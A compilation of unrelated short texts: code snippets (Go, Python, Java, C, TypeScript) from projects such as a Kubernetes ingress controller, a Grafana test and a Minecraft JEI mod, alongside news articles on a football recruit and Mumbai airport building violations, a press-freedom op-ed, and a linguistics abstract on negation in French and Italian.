Arch.from_points(self._out_center, points[1], points[0], self._out_radius, True),
None,
Arch(self._in_center[0], self._in_center[1], self._in_radius, 0, 2*numpy.pi, True))
overlap = (
Arch.from_points(self._out_center, points[0], points[1], self._out_radius, True),
Arch.from_points(center, points[1], points[0], radius, True))
return ArcsRegion(remains), ArcsRegion(overlap) |
// FaissClusteringNewWithParams function as declared in c_api/Clustering_c.h:91
func FaissClusteringNewWithParams(pClustering **Faissclustering, d int32, k int32, cp *Faissclusteringparameters) int32 {
cpClustering, _ := (**C.FaissClustering)(unsafe.Pointer(pClustering)), cgoAllocsUnknown
cd, _ := (C.int)(d), cgoAllocsUnknown
ck, _ := (C.int)(k), cgoAllocsUnknown
ccp, _ := cp.PassRef()
__ret := C.faiss_Clustering_new_with_params(cpClustering, cd, ck, ccp)
__v := (int32)(__ret)
return __v
} |
After getting his first power five conference offer from Wisconsin Saturday, Amherst (WI) High defensive tackle Tyler Biadasz maintained that he wanted to finish his camp circuit before making any college decisions.
That was before he let the emotions of getting an offer from his dream school sink in.
“It sunk in Sunday night,” Biadasz told BadgerNation. “I woke up today and felt like I was ready. I had some questions for Coach (Chryst), and I felt like I was ready. I thought this was the best fit for me. The location is perfect for me and my family. This has been a dream since my freshman year.”
Biadasz becomes the sixth commitment in Wisconsin’s 2016 recruiting class and the third from in-state, joining Grafton defensive end Luke Benzschawel and Menomonee inside linebacker Mason Stokke. Currently unranked by Scout.com, Biadasz held offers from Illinois State, South Dakota State, Southern Illinois and Western Illinois and was getting offers from several FBS schools.
“Paul Chryst was excited,” said Biadasz. “He said that’s awesome and we’re happy to have you. They were excited about me as a football player. We were both excited, so that’s awesome.”
Expected to slot in at nose tackle in Wisconsin’s 3-4 defense, the 6-4, 275-pound prospect is anxious to start improving his game.
“I need to get stronger, faster and technique wise I need to improve,” said Biadasz, who recorded 77 tackles, 10 tackles for a loss, five sacks and three forced fumbles for the Division 5 state runner-up Falcons last season. “I just need to keep doing everything that I’ve been doing since freshman year, getting stronger and faster each year and learning new techniques.” Canceling the rest of the camps he had scheduled, Biadasz plans to use that extra time for a little relaxation and to begin preparations to win his second state championship.
“I want to get back to the weight room, spend some times with my friends and enjoy the summer,” said Biadasz. “I want to get ready for the next football season now, because I don’t have to worry about my decision now. Hopefully we can go back to state for another title.”
.more-stories {margin:20px 0;} .more-stories a{display:block;width:100%; background:#efb900;height: 52px;text-align:center;line-height:44px;color:#202020; text-decoration:none;text-transform:uppercase;font-family:bebas_neue;font-size:20px;position:relative;overflow:hidden;letter-spacing:2px;-webkit-transition:all .15s ease-in;transition:all .2s ease-in;border:3px solid #efb900;}.more-stories a:hover{color:#fff;background:0 0;letter-spacing:3px;background:#121212;border:3px solid #121212;} @media (max-width: 600px) { .more-stories a {height:auto !important;line-height:1.4em;padding:10px;} }
Get the latest recruiting info on our insider board |
<filename>main.go
package main
import (
"context"
"flag"
"fmt"
"os"
"github.com/chanxuehong/log"
"golang.org/x/sync/errgroup"
"k8s.io/client-go/kubernetes"
"k8s.io/client-go/rest"
"kubernetes-ingress-controller/common"
"kubernetes-ingress-controller/logic/server"
"kubernetes-ingress-controller/logic/watcher"
)
var (
Host string
Port, TLSPort int
)
func main() {
_, ctx, _ := log.FromContextOrNew(context.Background(), nil)
flag.StringVar(&Host, "host", "0.0.0.0", "the host to bind")
flag.IntVar(&Port, "port", 80, "the insecure http port")
flag.IntVar(&TLSPort, "tsl-port", 443, "the secure https port")
flag.Parse()
config := common.GetFactory().Config()
fmt.Println(ctx, config)
// 从集群内的token和ca.crt获取 Config
restConfig, err := rest.InClusterConfig()
if err != nil {
log.ErrorContext(ctx, "InClusterConfig failed", "error", err.Error())
os.Exit(1)
}
// 从 restConfig 中创建一个新的 Clientset
client, err := kubernetes.NewForConfig(restConfig)
if err != nil {
log.ErrorContext(ctx, "NewForConfig failed", "error", err.Error())
os.Exit(1)
}
s := server.New()
w := watcher.NewWatcher(client, func(payload *watcher.Payload) {
s.Update(ctx, payload)
})
var eg errgroup.Group
eg.Go(func() error {
return s.Run(context.TODO())
})
eg.Go(func() error {
return w.Watcher(context.TODO())
})
if err := eg.Wait(); err != nil {
log.ErrorContext(ctx, "Wait failed", "err", err.Error())
}
}
|
Reporters and members of the media ask questions at the White House in Washington on May 10. (Jabin Botsford/The Washington Post)
We members of the media probably sound a little self-serving when we complain about constant attacks on press freedom.
Press freedom is a sacred democratic value, enshrined right there in the Constitution! we huff to whoever will listen.
Needless to say, lots of Americans remain unconvinced.
As I noted last week, a recent NPR-PBS NewsHour-Marist poll found that 4 in 10 Republicans believe the United States has too greatly expanded freedom of the press. Since then, an American Press Institute survey found that 6 in 10 Republicans believe news organizations primarily just prevent political leaders from doing their jobs.
Fed a steady diet of media vilification (served up by both left and right), Americans are apparently unmoved by citations of political texts that feel far removed from their daily lives. Maybe, they think, efforts to “open up our libel laws,” dismissals of the lamestream media as “fake news” and even threats of violence against journalists could do the country some good.
To those indifferent to abstract political ideals, let me offer a more practical reason to be alarmed by assaults on media freedom: the fact that the government can, and inevitably will, screw up.
Events over recent weeks suggest that Republicans’ war on the media should not be viewed in isolation. It’s part of a broader strategy to discredit and disempower any independent voice trying, however imperfectly, to hold politicians to account.
Take, for example, the relentless attacks on the Congressional Budget Office, a nonpartisan federal agency created in 1974 precisely so that Congress and the public could rely on technical expertise from independent analysts with no dog in the fight.
The CBO issues dozens of bill scores and reports each year, and no scores have come with higher stakes this year than its assessments of Republicans’ Obamacare repeal plans. Sensing that the news on the Senate’s latest bill would be bad, though, Republicans have been doing everything they can to smear the character, motives and competence of the agency. (Late Monday the bill was struck by what may turn out to be a death blow; two more Republican senators announced their opposition, leaving the legislation with no path to passage, at least in its current form.)
In March, asked about a CBO score forecasting that the House GOP’s health-care bill would cause tens of millions of Americans to lose their insurance, former House speaker and Trump surrogate Newt Gingrich called the federal agency “corrupt” and “dishonest.”
White House officials ramped up their own attacks over subsequent months. This past week the White House criticized the accuracy of the CBO in a video that misspelled the word “inaccurately.” (You can’t make this stuff up.)
(Meg Kelly/The Washington Post)
The last straw came in an op-ed published by The Post over the weekend, when two Trump officials preemptively declared that whatever the nonpartisan Congressional Budget Office reported on the Senate Republicans’ health-care bill, “the CBO’s estimates will be little more than fake news.”
That is, now the CBO is being slurred with the nastiest comparison of all: to the media.
The nation’s independent federal statistical agencies have lately found themselves in similar crosshairs. They have been praised when their numbers reflect favorably upon Republicans but mercilessly attacked when their data show otherwise.
The nonpartisan Office of Government Ethics, the internal watchdog tasked with helping executive-branch officials avoid conflicts of interest, has also been repeatedly and unfairly accused of partisanship under this administration. The neutering of this agency has made it much harder to ensure that federal officials are making decisions in the best interests of the country — an embarrassment at home and abroad.
“I think we are pretty close to a laughingstock at this point,” Walter M. Shaub Jr., the departing head of the agency, told the New York Times over the weekend.
And then there’s the Trump administration’s unrelenting attacks on an independent federal judiciary, the last best hope against government excess and impropriety.
The common message from Trump officials and co-partisans on Capitol Hill through all these actions: Trust us, and us alone. Anyone who contradicts us is spouting #fakenews.
Maybe this plan will buy Republicans some time, but they can’t outrun bad news forever. At some point, presumably, members of the public will notice if they, oh, lose their health insurance. Just because President Trump declares a Russia story or the unemployment rate “fake” doesn’t make it so. |
<reponame>paulwratt/cin-5.34.00
/* -*- C++ -*- */
/*************************************************************************
* Copyright(c) 1995~2005 <NAME> (<EMAIL>)
*
* For the licensing terms see the file COPYING
*
************************************************************************/
// 021220regexp.txt, Philippe
#include <list>
using namespace std;
class BaseStar {
//...
};
template<class Star> class StarList : public list <Star*> {
//...
};
typedef list<BaseStar*> blist;
#ifdef __CINT__
#pragma link C++ nestedclass;
#pragma link C++ nestedtypedef;
#pragma link C++ class BaseStar;
#pragma link C++ class StarList<BaseStar>;
#pragma link C++ class list<BaseStar*>;
//typedef list<BaseStar*> blist;
#pragma link C++ class blist::iterator;
#pragma link C++ class list<BaseStar*>::iterator;
#endif
#include <stdio.h>
void test() {
printf("success\n");
}
|
package commands
import (
"log"
"os"
"strings"
config "github.com/Skarlso/go-furnace/config"
fc "github.com/Skarlso/go-furnace/furnace-gcp/config"
"github.com/Yitsushi/go-commander"
"golang.org/x/net/context"
"golang.org/x/oauth2/google"
dm "google.golang.org/api/deploymentmanager/v2"
"google.golang.org/api/googleapi"
)
// Status commands for google Deployment Manager
type Status struct {
}
// Execute runs the create command
func (s *Status) Execute(opts *commander.CommandHelper) {
configName := opts.Arg(0)
if len(configName) > 0 {
dir, _ := os.Getwd()
if err := fc.LoadConfigFileIfExists(dir, configName); err != nil {
config.HandleFatal(configName, err)
}
}
log.Println("Looking for Deployment under project name: .", keyName(fc.Config.Main.ProjectName))
deploymentName := fc.Config.Gcp.StackName
log.Println("Deployment name is: ", keyName(deploymentName))
ctx := context.Background()
client, err := google.DefaultClient(ctx, dm.NdevCloudmanScope)
config.CheckError(err)
d, _ := dm.New(client)
project := d.Deployments.Get(fc.Config.Main.ProjectName, deploymentName)
p, err := project.Do()
if err != nil {
if err.(*googleapi.Error).Code != 404 {
config.HandleFatal("error while getting deployment: ", err)
} else {
config.HandleFatal("Stack not found!", nil)
}
}
manifestID := p.Manifest[strings.LastIndex(p.Manifest, "/")+1 : len(p.Manifest)]
manifest := d.Manifests.Get(fc.Config.Main.ProjectName, deploymentName, manifestID)
m, err := manifest.Do()
config.CheckError(err)
log.Println("Description: ", p.Description)
log.Println("Name: ", p.Name)
log.Println("Labels: ", p.Labels)
log.Println("Selflink: ", p.SelfLink)
log.Println("Layout: \n", m.Layout)
// Consider getting every resource status?
}
// NewStatus Creates a new status command
func NewStatus(appName string) *commander.CommandWrapper {
return &commander.CommandWrapper{
Handler: &Status{},
Help: &commander.CommandDescriptor{
Name: "status",
ShortDescription: "Get the status of an existing Deployment Management group.",
LongDescription: `Get the status of an existing Deployment Management group.`,
Arguments: "[--config=configFile]",
Examples: []string{"status [--config=configFile]"},
},
}
}
|
<filename>src/index.tsx
import { useRef } from 'react'
import ReactDOM from 'react-dom';
import EpubViewer from 'modules/epubViewer/EpubViewer'
import ReactEpubViewer from 'modules/reactViewer/ReactViewer'
import { ViewerRef } from 'types'
interface Props {
VIEWER_TYPE?: "ReactViewer" | "EpubViewer"
}
const App = ({ VIEWER_TYPE = "ReactViewer" }: Props) => {
const EPUB_URL = "/react-epub-viewer/files/Alices Adventures in Wonderland.epub";
const ref = useRef<ViewerRef>(null);
return (
<>
{VIEWER_TYPE === "ReactViewer" && <>
<ReactEpubViewer
url={EPUB_URL}
ref={ref}
/>
</>
}
{VIEWER_TYPE === "EpubViewer" && <>
<EpubViewer
url={EPUB_URL}
ref={ref}
/>
</>
}
</>
);
}
ReactDOM.render(<App />, document.getElementById('root')); |
/*******************************************************/
/**
Checks that the parser recognizes incomplete initial segments of a log
record as incomplete. */
static
void
recv_check_incomplete_log_recs(
byte* ptr,
ulint len)
{
ulint i;
byte type;
ulint space;
ulint page_no;
byte* body;
for (i = 0; i < len; i++) {
ut_a(0 == recv_parse_log_rec(ptr, ptr + i, &type, &space,
&page_no, &body));
}
} |
/**
* Method hitHist
* returns a histogram of hits on each Ship in the form of an int[5].
* @param boards Any of the Boards
* @return the histogram
*/
public static int[] hitHist (Board boards) {
int[] noHits = new int[5];
for (int i = 0; i < boards.carrier.hits.length; i++) {
if (boards.carrier.hits[i]) noHits[0]++;
}
for (int i = 0; i < boards.battleShip.hits.length; i++) {
if (boards.battleShip.hits[i]) noHits[1]++;
}
for (int i = 0; i < boards.cruiser.hits.length; i++) {
if (boards.cruiser.hits[i]) noHits[2]++;
}
for (int i = 0; i < boards.submarine.hits.length; i++) {
if (boards.submarine.hits[i]) noHits[3]++;
}
for (int i = 0; i < boards.destroyer.hits.length; i++) {
if (boards.destroyer.hits[i]) noHits[4]++;
}
return noHits;
} |
//somewhat dangerous as it allows reading anywhere in the file
bool mzpSAXMzmlHandler::readSpectrumFromOffset(f_off offset, int scNm){
spec->clear();
m_scanNumOverride=scNm;
if (offset<0) return false;
parseOffset(offset);
return true;
} |
"""
7 -> 1 -> 6 == 617
5 -> 9 -> 2 == 295
------------------
2 -> 1 -> 9 == 912
"""
from node import Node
def compute_sum(first: Node, second: Node) -> Node:
carry = 0
head = current = first
while first and second:
result = first.val + second.val + carry
first.val = result % 10
carry = result // 10
current = first
first = first.next
second = second.next
while first:
result = first.val + carry
first.val = result % 10
carry = result // 10
current = first
first = first.next
while second:
result = second.val + carry
second.val = result % 10
carry = result // 10
current.next = second
current = current.next
second = second.next
if carry:
current.next = Node(carry)
return head
for use_case, expected_result in [
(([7, 1, 6], [5, 9, 2]), [2, 1, 9]),
(([7, 1], [5, 9, 2]), [2, 1, 3]),
(([9, 9, 9], [1]), [0, 0, 0, 1]),
(([9], [1]), [0, 1])
]:
first, second = use_case
result = compute_sum(Node.build(first), Node.build(second))
expected_result = Node.build(expected_result)
assert result == expected_result, \
"{} != {}".format(result, expected_result)
|
def choices(question_id):
question = Question.query.get(question_id)
if request.method == 'POST':
choice = request.form.get('choice')
status = request.form.get('status')
points = request.form.get('points')
status_real = True
if status.lower() == "true" or status.lower() == "t":
status_real = True
elif status.lower() == 'false ' or status.lower() == "f":
status_real = False
else:
flash("Please enter valid input")
new_choice = Choices(question_id=question.id,choice=choice,status=status_real,points=points)
db.session.add(new_choice)
db.session.commit()
return redirect(url_for('.choices',question_id=question.id, game_id= question.game_id))
return render_template('choices.html',question_id=question.id, game_id= question.game_id) |
/*
This method resets the stages for the backup process
*/
private void addStages(){
if(dataHandler.query("select * from stages").length > 0){
dataHandler.runQuery("delete from stages");
}
for(int i = 0; i < stages.length; i++){
dataHandler.runQuery("insert into stages (stage_name) values ('" + stages[i] + "')");
}
} |
def merge_all_intervals(bed, split=False):
if split:
msg = "Splitting the BED12 records"
logger.debug(msg)
bed = split_bed12(bed)
seqnames = bed['seqname'].unique()
strands = ("+", "-")
all_matches = []
for strand in strands:
m_strand = bed['strand'] == strand
for seqname in seqnames:
m_seqname = bed['seqname'] == seqname
m_filter = m_strand & m_seqname
if sum(m_filter) == 0:
continue
interval_starts = bed.loc[m_filter, 'start']
interval_ends = bed.loc[m_filter, 'end']
interval_info = bed.loc[m_filter, 'id']
merged_intervals = merge_intervals(interval_starts,
interval_ends, interval_info)
(merged_starts, merged_ends, merged_info) = merged_intervals
merged_ids_str = [":::".join(merged_id) for merged_id in merged_info]
num_merged_ids = [len(merged_id) for merged_id in merged_info]
df = pd.DataFrame()
df['start'] = merged_starts
df['end'] = merged_ends
df['seqname'] = seqname
df['strand'] = strand
df['score'] = num_merged_ids
df['id'] = merged_ids_str
df['merged_ids'] = merged_info
all_matches.append(df)
all_matches = pd.concat(all_matches)
fields = bed6_field_names + ['merged_ids']
return all_matches[fields] |
/**------------------------------------------------------
* Makes and returns a new event-processing scene-graph
* modifying thread. This is used for synchronous method
* calls made by the origonal event-processing scene-graph
* when it wants to pause the original thread but still
* keep graphics and animations running. For example it
* is used for modal dialogs.
* @return the thread
* @see MiPartModifierThread
*------------------------------------------------------*/
public MiPartModifierThread makeNewRunningThread()
{
MiPartModifierThread tmp = new MiPartModifierThread(this);
tmp.start();
return(tmp);
} |
/**
* Compile a json string into a JsonElement. Note this is required for the test since Gson
* objects cannot be mocked.
*
* @param jsonString string containing serialized json content to parse.
* @return JsonElement for the root of the parsed json.
*/
private JsonElement compileJson(String jsonString) {
JsonParser parser = new JsonParser();
JsonElement result = parser.parse(jsonString);
return result;
} |
Yeshwanth Shenoy's PIL resulted in a court order to demolish 100-plus buildings around Mumbai airport.
In a city where real estate is a premium luxury - either owning a home is a pipe dream, or for those that have, their greatest asset - a Bombay High Court order on Wednesday, asking the Directorate General of Civil Aviation (DGCA) and other agencies to demolish or reduce the height of around 427 buildings in violation of norms, has sent tremors through the residential belt near Mumbai airport. And all this, within the next two months.Petitioner Yeshwanth Shenoy recalls what set him off on this path. "My mission began in 2010, after the Mangalore air crash." On May 22, an Air India Express Flight 812 from Dubai to Mangalore overshot the runway on landing, impacting an illegal structure, after which it caught fire. Of the 160 passengers and six crewmembers on board, only eight survived; it was the third deadliest aviation disaster in India. "That," says Shenoy "was the starting point." From then on, "I dug out documents which proved that lives could have been saved had certain safety norms been met in Mangalore."Shenoy, an Ernakulam (Cochin)-based lawyer, was in Mumbai on Thursday and spoke on why he is interested in the city, the High Court order, permissions and collusions and finally, being a marked man.My vision broadened after my research into the Mangalore crash. I read this paper (mid-day) and followed numerous reports about a developer's building of over 20 meters getting a No Objection Certificate (NOC) despite it being very close to the main airport runway. I filed a PIL. I estimate that there could be at least 8,000 such obstacles within an 11-km radius near the airport.Why should there be a personal motive? A lawyer may fight for his clients, but he also has to look at the bigger picture, the larger good of society. He has a public duty to do so. Suppose a boiler bursts in a chemical factory. A client approaches a lawyer to help him fight for compensation. While fighting for his client, the lawyer may learn that during safety audits of the factory, the boiler, though malfunctioning, was not removed. It is his public duty then to fight for that boiler to be removed - for the greater, common good.I fly in to Mumbai very often for work. Every time we land, it is a thud, thud, thud, instead of a smooth landing. I have talked to so many Mumbai pilots, who, when I tell them about the landings say to me, 'do you even know the obstacles we face?' Look at the slums near the airport, in case of an accident, you may have 5,000 to 10,000 lives gone in a trice. The combination a plane crash can unleash - airplane fuel, a fire and then oxygen (the oxygen masks) - you have a lethal formula.There are two kinds of buildings, those that are absolutely illegal, with no permissions at all, and those who have got permissions because airport authority officials are in collusion with developers.People need to wake up. Today, everybody is blaming Yeshwanth Shenoy. When there is an air crash, they will not blame Yeshwanth Shenoy, but ask why these buildings were allowed in the first place. Obstacles threaten even those whose buildings do not flout the norms, but are in the vicinity. Unfortunately, in this country the hardest hit are those that follow the laws.There is cynicism that the demolition will never take place, this will be challenged You will not have to wait for 20 or 30 years for an air crash, I am guaranteeing this. Science and Mathematics does not wait for anybody.First of all, people have to look at the rationale behind a demolition. Then, they must come together, unite, as that is their strength and send the erring developer to jail. With these corrupt builders cooling their heels in Arthur Road jail, Mumbai will be a better city.I am already a marked man. I have received threats. But then God gives life and God takes it away. |
/*
* Compress the input data to the output buffer until we run out of input
* data. Each time the output buffer falls below the compression bound for
* the input buffer, invoke the archive_contents() method for then next sink.
*
* Note that since we're compressing the input, it may very commonly happen
* that we consume all the input data without filling the output buffer. In
* that case, the compressed representation of the current input data won't
* actually be sent to the next bbsink until a later call to this function,
* or perhaps even not until bbsink_lz4_end_archive() is invoked.
*/
static void
bbsink_lz4_archive_contents(bbsink *sink, size_t avail_in)
{
bbsink_lz4 *mysink = (bbsink_lz4 *) sink;
size_t compressedSize;
size_t avail_in_bound;
avail_in_bound = LZ4F_compressBound(avail_in, &mysink->prefs);
if ((mysink->base.bbs_next->bbs_buffer_length - mysink->bytes_written) <
avail_in_bound)
{
bbsink_archive_contents(sink->bbs_next, mysink->bytes_written);
mysink->bytes_written = 0;
}
compressedSize = LZ4F_compressUpdate(mysink->ctx,
mysink->base.bbs_next->bbs_buffer + mysink->bytes_written,
mysink->base.bbs_next->bbs_buffer_length - mysink->bytes_written,
(uint8 *) mysink->base.bbs_buffer,
avail_in,
NULL);
if (LZ4F_isError(compressedSize))
elog(ERROR, "could not compress data: %s",
LZ4F_getErrorName(compressedSize));
mysink->bytes_written += compressedSize;
} |
def find_max_values(table_1, table_2):
x, y = create_array(table_1)
xs, ys = create_array(table_2)
max_x = max(np.append(x, xs))
min_x = min(np.append(x, xs))
max_y = max(np.append(y, ys))
min_y = min(np.append(y, ys))
ratio = (max_y - min_y) / (max_x - min_x)
return max_x, min_x, max_y, min_y, ratio |
def patch(self, request, pk, format=None):
bidder = get_object_or_404(AvailableBidders, bidder_perdet=pk)
user = UserProfile.objects.get(user=self.request.user)
serializer = self.serializer_class(bidder, data=request.data, partial=True)
if serializer.is_valid():
serializer.save(last_editing_user=user, update_date=datetime.now())
return Response(status=status.HTTP_204_NO_CONTENT)
else:
return Response(status=status.HTTP_400_BAD_REQUEST) |
<reponame>deepeshhada/HyperTeNet
import pickle
import itertools
import pdb
from time import time
from collections import defaultdict
import numpy as np
import scipy.sparse as sp
from data.dataset import Dataset
from data.tenet_dataset import TenetDataset
from utils import utils
import torch
class EmbedDataset(TenetDataset):
def __init__(self, args):
TenetDataset.__init__(self, args)
self.user_edge_index, self.list_edge_index, self.item_edge_index = utils.load_pickle(args.path + '/' + args.embed_type + '/' + str(args.knn_k) + '/' + args.dataset + '.user_list_item_knn.pkl')
|
<filename>internal/vulnstore/postgres/querybuilder.go
package postgres
import (
"fmt"
"strconv"
"strings"
"github.com/doug-martin/goqu/v8"
_ "github.com/doug-martin/goqu/v8/dialect/postgres"
"github.com/rs/zerolog/log"
"github.com/quay/claircore"
"github.com/quay/claircore/internal/vulnstore"
"github.com/quay/claircore/libvuln/driver"
)
// getQueryBuilder validates a IndexRecord and creates a query string for vulnerability matching
func buildGetQuery(record *claircore.IndexRecord, opts *vulnstore.GetOpts) (string, error) {
matchers := opts.Matchers
psql := goqu.Dialect("postgres")
exps := []goqu.Expression{}
// Add package name as first condition in query.
if record.Package.Name == "" {
return "", fmt.Errorf("IndexRecord must provide a Package.Name")
}
packageQuery := goqu.And(
goqu.Ex{"package_name": record.Package.Name},
goqu.Ex{"package_kind": record.Package.Kind},
)
exps = append(exps, packageQuery)
// If the package has a source, convert the first expression to an OR.
if record.Package.Source.Name != "" {
sourcePackageQuery := goqu.And(
goqu.Ex{"package_name": record.Package.Source.Name},
goqu.Ex{"package_kind": record.Package.Source.Kind},
)
or := goqu.Or(
packageQuery,
sourcePackageQuery,
)
exps[0] = or
}
// add matchers
seen := make(map[driver.MatchConstraint]struct{})
for _, m := range matchers {
if _, ok := seen[m]; ok {
continue
}
var ex goqu.Ex
switch m {
case driver.PackageModule:
ex = goqu.Ex{"package_module": record.Package.Module}
case driver.DistributionDID:
ex = goqu.Ex{"dist_id": record.Distribution.DID}
case driver.DistributionName:
ex = goqu.Ex{"dist_name": record.Distribution.Name}
case driver.DistributionVersionID:
ex = goqu.Ex{"dist_version_id": record.Distribution.VersionID}
case driver.DistributionVersion:
ex = goqu.Ex{"dist_version": record.Distribution.Version}
case driver.DistributionVersionCodeName:
ex = goqu.Ex{"dist_version_code_name": record.Distribution.VersionCodeName}
case driver.DistributionPrettyName:
ex = goqu.Ex{"dist_pretty_name": record.Distribution.PrettyName}
case driver.DistributionCPE:
ex = goqu.Ex{"dist_cpe": record.Distribution.CPE}
case driver.DistributionArch:
ex = goqu.Ex{"dist_arch": record.Distribution.Arch}
case driver.RepositoryName:
ex = goqu.Ex{"repo_name": record.Repository.Name}
default:
return "", fmt.Errorf("was provided unknown matcher: %v", m)
}
exps = append(exps, ex)
seen[m] = struct{}{}
}
if opts.VersionFiltering {
v := &record.Package.NormalizedVersion
var lit strings.Builder
b := make([]byte, 0, 16)
lit.WriteString("'{")
for i := 0; i < 10; i++ {
if i != 0 {
lit.WriteByte(',')
}
lit.Write(strconv.AppendInt(b, int64(v.V[i]), 10))
}
lit.WriteString("}'::int[]")
exps = append(exps, goqu.And(
goqu.C("version_kind").Eq(v.Kind),
goqu.L("vulnerable_range @> "+lit.String()),
))
}
query := psql.Select(
"id",
"name",
"description",
"issued",
"links",
"severity",
"normalized_severity",
"package_name",
"package_version",
"package_module",
"package_arch",
"package_kind",
"dist_id",
"dist_name",
"dist_version",
"dist_version_code_name",
"dist_version_id",
"dist_arch",
"dist_cpe",
"dist_pretty_name",
"arch_operation",
"repo_name",
"repo_key",
"repo_uri",
"fixed_in_version",
"updater",
).From("vuln").Where(exps...)
sql, _, err := query.ToSQL()
if err != nil {
log.Debug().
Err(err).
Msg("error generating sql")
}
return sql, nil
}
|
<reponame>shionAoi/sicuy-angular
import {Injectable} from '@angular/core';
import {AddPoolMutation} from './graphql/add-pool.mutation';
import {Pool, PoolInput, PoolUpdate} from '../../../../api/graphql';
import {map} from 'rxjs/operators';
import {Observable} from 'rxjs';
import {UpdatePoolMutation} from './graphql/update-pool.mutation';
import {ActivatePoolMutation} from './graphql/activate-pool.mutation';
import {DeactivatePoolMutation} from './graphql/deactivate-pool.mutation';
import {RemovePoolMutation} from './graphql/remove-pool.mutation';
@Injectable({
providedIn: 'root'
})
export class PoolsService {
constructor(private addPoolMutation: AddPoolMutation,
private updatePoolMutation: UpdatePoolMutation,
private deactivatePoolMutation: DeactivatePoolMutation,
private removePoolMutation: RemovePoolMutation,
private activatePoolMutation: ActivatePoolMutation) {
}
addPool(pool: PoolInput): Observable<Pool> {
return this.addPoolMutation.mutate({ pool })
.pipe(
map((response) => response.data.addPool)
)
}
updatePool(idPool: string, update: PoolUpdate): Observable<Pool> {
return this.updatePoolMutation.mutate({ idPool, update })
.pipe(
map((response) => response.data.updatePool)
)
}
updatePoolStatus(idPool: string, newStatus: boolean): Observable<boolean> {
if (newStatus) {
return this.activatePoolMutation.mutate({ idPool })
.pipe(
map((response) => response.data.activatePool)
)
} else {
return this.deactivatePoolMutation.mutate({ idPool })
.pipe(
map((response) => response.data.deactivatePool)
)
}
}
removePool(idPool: string): Observable<boolean> {
return this.removePoolMutation.mutate({ idPool: idPool })
.pipe(
map((response) => response.data.deletePool)
)
}
}
|
package alerting
import (
"encoding/json"
"fmt"
"io"
"net/http"
"testing"
"github.com/stretchr/testify/require"
"github.com/grafana/grafana/pkg/services/ngalert/notifier/channels_config"
"github.com/grafana/grafana/pkg/services/org"
"github.com/grafana/grafana/pkg/services/user"
"github.com/grafana/grafana/pkg/tests/testinfra"
)
func TestIntegrationAvailableChannels(t *testing.T) {
testinfra.SQLiteIntegrationTest(t)
dir, path := testinfra.CreateGrafDir(t, testinfra.GrafanaOpts{
DisableLegacyAlerting: true,
EnableUnifiedAlerting: true,
DisableAnonymous: true,
AppModeProduction: true,
})
grafanaListedAddr, store := testinfra.StartGrafana(t, dir, path)
// Create a user to make authenticated requests
createUser(t, store, user.CreateUserCommand{
DefaultOrgRole: string(org.RoleEditor),
Password: "password",
Login: "grafana",
})
alertsURL := fmt.Sprintf("http://grafana:password@%s/api/alert-notifiers", grafanaListedAddr)
// nolint:gosec
resp, err := http.Get(alertsURL)
require.NoError(t, err)
t.Cleanup(func() {
err := resp.Body.Close()
require.NoError(t, err)
})
b, err := io.ReadAll(resp.Body)
require.NoError(t, err)
require.Equal(t, 200, resp.StatusCode)
expNotifiers := channels_config.GetAvailableNotifiers()
expJson, err := json.Marshal(expNotifiers)
require.NoError(t, err)
require.Equal(t, string(expJson), string(b))
}
|
The evolution of negation in French and Italian: Similarities and differences
This article examines similarities and differences in the evolution of both standard clause negation and n-word negation in French and Italian. The two languages differ saliently in the extent to which standard negation features postverbal markers. We suggest that a convergence of phonetic, prosodic, morphosyntactic, and pragmatic changes in the evolution of French may explain why the grammaticalization of the postverbal marker is significantly more advanced in that language. Two types of n-word negation must be considered: (i) those where the n-word occurs postverbally, and (ii) those where an n-word is positioned preverbally. In the former type, French allows deletion of the preverbal marker, whereas Italian does so to a much lesser extent. In the second type, French allows (indeed, normatively demands) insertion of a second preverbal negative marker, whereas Italian does not. We suggest that this is attributable to the respective positive vs negative etymologies of the n-words. In type (i) constructions, this etymological difference appears to make Italian a negative-concord language from the outset. In contrast, negative concord in Modern French has, to a large extent, developed gradually out of what was originally a reinforcement of standard negation by positive items with scalar properties. Our analysis suggests that the pace and form of grammaticalization cannot be attributed to any single cause, but is rather the result of a confluence of formal and functional factors. |
<gh_stars>100-1000
package mezz.jei.transfer;
import javax.annotation.Nullable;
import java.util.ArrayList;
import java.util.Collections;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Set;
import mezz.jei.config.IServerConfig;
import mezz.jei.config.ServerConfig;
import net.minecraft.world.entity.player.Player;
import net.minecraft.world.inventory.InventoryMenu;
import net.minecraft.world.inventory.Slot;
import net.minecraft.world.item.ItemStack;
import com.google.common.collect.ImmutableSet;
import mezz.jei.api.constants.VanillaRecipeCategoryUid;
import mezz.jei.api.gui.IRecipeLayout;
import mezz.jei.api.gui.ingredient.IGuiIngredient;
import mezz.jei.api.gui.ingredient.IGuiItemStackGroup;
import mezz.jei.api.helpers.IStackHelper;
import mezz.jei.api.recipe.transfer.IRecipeTransferError;
import mezz.jei.api.recipe.transfer.IRecipeTransferHandler;
import mezz.jei.api.recipe.transfer.IRecipeTransferHandlerHelper;
import mezz.jei.api.recipe.transfer.IRecipeTransferInfo;
import mezz.jei.config.ServerInfo;
import mezz.jei.gui.ingredients.GuiItemStackGroup;
import mezz.jei.network.Network;
import mezz.jei.network.packets.PacketRecipeTransfer;
import net.minecraft.network.chat.Component;
import net.minecraft.network.chat.TranslatableComponent;
import net.minecraft.world.item.crafting.CraftingRecipe;
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class PlayerRecipeTransferHandler implements IRecipeTransferHandler<InventoryMenu, CraftingRecipe> {
private static final Logger LOGGER = LogManager.getLogger();
private final IStackHelper stackHelper;
private final IRecipeTransferHandlerHelper handlerHelper;
private final IRecipeTransferInfo<InventoryMenu, CraftingRecipe> transferHelper;
public PlayerRecipeTransferHandler(IStackHelper stackhelper, IRecipeTransferHandlerHelper handlerHelper) {
this.stackHelper = stackhelper;
this.handlerHelper = handlerHelper;
this.transferHelper = new BasicRecipeTransferInfo<>(InventoryMenu.class, CraftingRecipe.class, VanillaRecipeCategoryUid.CRAFTING, 1, 4, 9, 36);
}
@Override
public Class<InventoryMenu> getContainerClass() {
return transferHelper.getContainerClass();
}
@Override
public Class<CraftingRecipe> getRecipeClass() {
return transferHelper.getRecipeClass();
}
@Nullable
@Override
public IRecipeTransferError transferRecipe(InventoryMenu container, CraftingRecipe recipe, IRecipeLayout recipeLayout, Player player, boolean maxTransfer, boolean doTransfer) {
if (!ServerInfo.isJeiOnServer()) {
